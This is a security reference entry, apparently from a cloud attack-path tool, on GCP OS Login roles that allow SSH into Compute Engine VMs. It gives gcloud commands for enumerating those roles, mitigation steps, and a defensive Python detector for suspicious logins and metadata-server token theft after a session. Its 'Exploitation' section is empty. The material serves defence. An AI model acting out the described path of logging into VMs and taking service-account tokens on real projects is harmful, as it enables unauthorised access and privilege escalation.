GCP_CAN_SSH_VM

Summary

FSProtect ACL Alias

GCP_CAN_SSH_VM

GCP Alias

Compute Execution & Pipeline Pivots

Affected Object Types

Projects

Exploitation Certainty

Likely

Granting Roles

roles/compute.osLogin, roles/compute.osAdminLogin

Description

GCP_CAN_SSH_VM indicates that an identity holds OS Login permissions (roles/compute.osLogin or roles/compute.osAdminLogin), which allow logging into existing GCE VMs via OS Login. OS Login ties SSH access to the caller's IAM identity, replacing traditional per-instance SSH key management. An attacker with this permission can log into any VM in the project (or across the whole organization, if the role is granted at that level) and interact with the guest OS; with roles/compute.osAdminLogin the login also carries sudo rights.

Identification

gcloud CLI

PROJECT_ID="my-project"

# List VMs with their zone, state, attached service account and the
# instance-level enable-oslogin metadata key (empty when not set)
gcloud compute instances list --project="$PROJECT_ID" \
  --format="table(name, zone, status, serviceAccounts[0].email, metadata.items.enable-oslogin)"

# Find which principals hold OS Login roles on the project
gcloud projects get-iam-policy "$PROJECT_ID" --format=json | \
  jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}'

# Check whether OS Login is enabled at the project level (common instance metadata)
gcloud compute project-info describe --project="$PROJECT_ID" \
  --format="value(commonInstanceMetadata.items)" | grep -i enable-oslogin

# Check the instance-level setting; an instance value overrides the project default
gcloud compute instances describe VM_NAME --zone=ZONE --project="$PROJECT_ID" \
  --format="value(metadata.items)"

GCP Console

  1. Open GCP Console → Compute Engine → VM Instances.

  2. Click on a VM → SSH button — if enabled, IAM principals with OS Login roles can access it.

  3. Check IAM & Admin → IAM for Compute OS Login or Compute OS Admin Login roles.

Exploitation

gcloud CLI

Mitigation

  1. Scope OS Login roles narrowly — assign at specific VM resource level rather than project-wide where possible.

  2. Use roles/compute.osLogin (non-sudo) instead of roles/compute.osAdminLogin unless root access is needed.

  3. Attach minimal-privilege SAs to VMs — VMs that don't need elevated GCP API access should use a dedicated low-privilege SA.

  4. Block metadata server access from VMs that don't need it using custom metadata or network controls.

Detection

Log Type       Method                               Key Fields
Data Access    compute.instances.get via OS Login   SSH connection attempts
System Event   OS Login SSH auth                    resource.type=gce_instance

Alert on:

  • OS Login SSH connections to VMs running high-privilege SAs.

  • SSH connections from unexpected geographic locations or IP ranges.

  • Metadata server token requests shortly after an OS Login session begins.
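The three alert conditions above, implemented as an added example over constructed log lines (this is not FSProtect's or Google's code). The inventory, the expected-IP allowlist and the simplified log field names (ts, kind, instance, principal, caller_ip) are assumptions; real Cloud Logging entries carry resource.type=gce_instance and a much richer schema.

```python
import json
from datetime import datetime, timedelta

# Constructed inventory (hypothetical names): VM -> attached SA and whether that SA
# holds high-privilege roles in the project.
INVENTORY = {
    "web-1": {"sa": "web-sa@example-project.iam.gserviceaccount.com", "privileged": False},
    "ci-runner-1": {"sa": "deploy-sa@example-project.iam.gserviceaccount.com", "privileged": True},
}
# Constructed allowlist of expected source-IP prefixes (documentation range, not real).
EXPECTED_IP_PREFIXES = ("203.0.113.",)

# Constructed, simplified log lines; field names are assumptions, not the exact
# Cloud Logging schema.
SAMPLE_LOG_LINES = """
{"ts": "2024-05-01T10:00:00Z", "kind": "oslogin_ssh_auth", "instance": "web-1", "principal": "alice@example.com", "caller_ip": "203.0.113.10"}
{"ts": "2024-05-01T10:05:00Z", "kind": "oslogin_ssh_auth", "instance": "ci-runner-1", "principal": "bob@example.com", "caller_ip": "198.51.100.7"}
{"ts": "2024-05-01T10:05:20Z", "kind": "metadata_token_request", "instance": "ci-runner-1"}
{"ts": "2024-05-01T12:00:00Z", "kind": "metadata_token_request", "instance": "web-1"}
""".strip().splitlines()


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect(log_lines, inventory, window_seconds=120):
    """Return (rule, instance, principal) tuples for the three alert conditions."""
    events = sorted((json.loads(line) for line in log_lines if line.strip()), key=lambda e: e["ts"])
    alerts = []
    last_ssh = {}  # instance -> (timestamp, principal) of the most recent OS Login auth
    for event in events:
        ts, inst = parse_ts(event["ts"]), event["instance"]
        if event["kind"] == "oslogin_ssh_auth":
            principal = event["principal"]
            last_ssh[inst] = (ts, principal)
            # Rule 1: OS Login session on a VM whose attached SA is high-privilege.
            if inventory.get(inst, {}).get("privileged"):
                alerts.append(("ssh_to_privileged_sa_vm", inst, principal))
            # Rule 2: session from outside the expected source ranges.
            if not event.get("caller_ip", "").startswith(EXPECTED_IP_PREFIXES):
                alerts.append(("ssh_from_unexpected_ip", inst, principal))
        elif event["kind"] == "metadata_token_request" and inst in last_ssh:
            # Rule 3: SA token fetched from the metadata server shortly after a session began.
            start, principal = last_ssh[inst]
            if timedelta(0) <= ts - start <= timedelta(seconds=window_seconds):
                alerts.append(("token_request_after_ssh", inst, principal))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG_LINES, INVENTORY):
        print(alert)
```

The web-1 token request two hours after alice's session falls outside the window and is not flagged, which is the distinction the third bullet relies on.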

References

  • https://cloud.google.com/compute/docs/oslogin/set-up-oslogin

  • https://cloud.google.com/compute/docs/metadata/overview
